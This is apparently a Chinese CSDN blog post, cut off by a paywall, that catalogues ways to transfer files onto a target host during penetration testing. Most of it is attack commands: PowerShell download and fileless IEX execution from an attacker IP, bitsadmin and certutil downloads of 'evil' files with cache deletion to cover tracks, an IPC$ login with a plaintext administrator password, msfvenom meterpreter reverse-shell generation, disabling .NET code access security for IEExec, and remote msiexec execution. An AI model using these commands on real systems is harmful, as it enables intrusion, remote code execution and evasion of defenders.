Windows&Linux文件传输方式总结

最新推荐文章于 2024-03-27 19:58:38 发布

VIP文章 qq_43479892

最新推荐文章于 2024-03-27 19:58:38 发布

阅读量2.3k

点赞数

分类专栏： python 文章标签：计算机

本文链接：https://blog.csdn.net/qq_43479892/article/details/123810151

版权

Python微信订餐小程序课程视频

https://edu.csdn.net/course/detail/36074

Python实战量化交易理财系统

https://edu.csdn.net/course/detail/35475
在渗透过程中，通常会需要向目标主机传送一些文件，来达到权限提升、权限维持等目的，本篇文章主要介绍一些windows和Linux下常用的文件传输方式。

Windows

利用FTP协议上传

在本地或者VPS上搭建FTP服务器，通过简单的FTP命令即可实现文件的上传。常用的FTP命令：

open <服务器地址> :连接服务器
cd <目录名> ：进入指定目录
lcd <文件夹路径> : 定位本地文件夹
type：查看当前的传输方式
ascii：设定传输方式为ASCII码方式 
binary：设定传输方式为二进制方式
put <文件名> [newname]  上传
send <文件名> [newname]  上传
get：下载单个文件  get filename [newname]  (filename为下载的ftp服务器上的文件名，newname为保存在本都计算机上时使用的名字，如果不指定newname，文件将以原名保存。
mget：下载多个文件mget filename [filename ....]（mget命令支持通配符“*”和“?”，比如：mget  *.jpg 表示下载ftp服务器当前目录下的所有扩展名为jpg的文件。）
prompt：关闭/打开互交提示。

例如，我们可以通过在攻击主机上搭建FTP服务，之后在目标主机上通过cmd下的ftp进行远程连接:
首先，在攻击主机使用IPOP启动一个简易的FTP服务

powershell

远程下载文件保存在本地：

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/imag/evil.txt','evil.exe')

远程执行命令，无文件落地：

powershell -nop -w hidden -c "IEX ((new-object
net.webclient).downloadstring('http://192.168.28.128/imag/evil.txt'))"

⭐bitsadmin

bitsadmin是一个命令行工具，可用于创建下载或上传并监视其进度，自windows7 以上版本内置bitsadmin，它可以在网络不稳定的状态下下载文件，出错会自动重试，在比较复杂的网络环境下，有着不错的性能。
我们可以在cmd中输入bitsadmin来查看其使用说明：

我们可以通过在目标主机上执行以下命令来实现远程文件下载：

bitsadmin /transfer n http://192.168.174.1:1234/evil.txt C:\evil.exe

⭐certutil

certutil.exe是一个命令行程序，作为证书服务的一部分安装，你可以使用Certutil.exe转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原CA组件，以及验证证书，密钥对和证书链。xp-win10都自带。
我们可以在cmd中输入以下命令来查看certutil的具体使用方法：

certutil -?

由于certutil下载文件都会留下缓存，所以一般都建议下载完文件后对缓存进行删除。

注：缓存目录为："%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content"

#下载文件
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php
#删除缓存
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete

ipc$文件共享

IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

#建立远程IPC连接
net use \\192.168.28.128\ipc$ /user:administrator "abc123!"
#复制远程文件到本地主机
copy \\192.168.28.128\c$\2.txt D:\test

IEExec

IEexec.exe应用程序是.NET Framework附带程序，存在于多个系统白名单内。

生成Payload：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.28.131 lport=4444 -f exe -o evil.exe

使用管理员身份打开cmd，分别运行下面两条命令:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s offC:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe

msiexec

msiexec是windows自带的cmd工具，支持远程下载功能，攻击者可以将msi文件上传到服务器并执行，下面通过一个实例做演示说明，首先我们通过msfvenom来构造一个恶意的msi程序(这里以弹计算器为例，在实战中可以根据需要进行修改)，并启动一个简易HTTP服务：

之后在目标主机上通过msiexec来实现远程下载文件并执行，该方法同样可以实现无文件落地攻击：

msiexec /q /i http://192.168.174.131:1234/evil.msi

最低0.47元/天解锁文章

qq_43479892

关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
Windows&Linux文件传输方式总结

Python微信订餐小程序课程视频https://edu.csdn.net/course/detail/36074Python实战量化交易理财系统https://edu.csdn.net/course/detail/35475在渗透过程中，通常会需要向目标主机传送一些文件，来达到权限提升、权限维持等目的，本篇文章主要介绍一些windows和Linux下常用的文件传输方式。Windows利用FTP协议上传在本地或者VPS上搭建FTP服务器，通过简单的FTP命令即可实现文件的上传。常用的FTP命令
复制链接

扫一扫